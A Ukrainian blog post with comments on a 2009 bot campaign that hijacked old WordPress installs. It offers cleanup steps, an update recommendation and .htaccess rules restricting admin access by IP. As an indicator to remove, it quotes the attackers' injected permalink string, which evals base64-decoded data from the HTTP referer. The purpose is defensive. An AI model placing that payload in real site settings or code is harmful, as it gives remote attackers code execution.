Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.
Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.
І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)
А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:
- В налаштуваннях ЧПУ, поміняти з
/%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
на
/%postname%/
(у вас може відрізнятись структура, по аналогії я думаю зрозумієте :)) - Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
- Оновити WordPress до версії 2.8.4
Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:
- зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
- створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic
order deny,allow deny from all allow from 91.134.98.173 а якщо у вас динамічна айпішка, то краще напишіть так:
AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic
order deny,allow deny from all allow from 91.134.0.0/255.255.0.0 Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.
- Збережіть файл. Все.
Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»
Бережіть себе і бережіть свій блог.
Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.
ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.
щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.
Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.
судячи з коментарів у Лекактуса:http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись
Я обмежив доступ по ір, у мене постійна адреса.
До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.
правильно робиш
Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя
Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.
А якщо вже взломали,що тодi робити???
ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни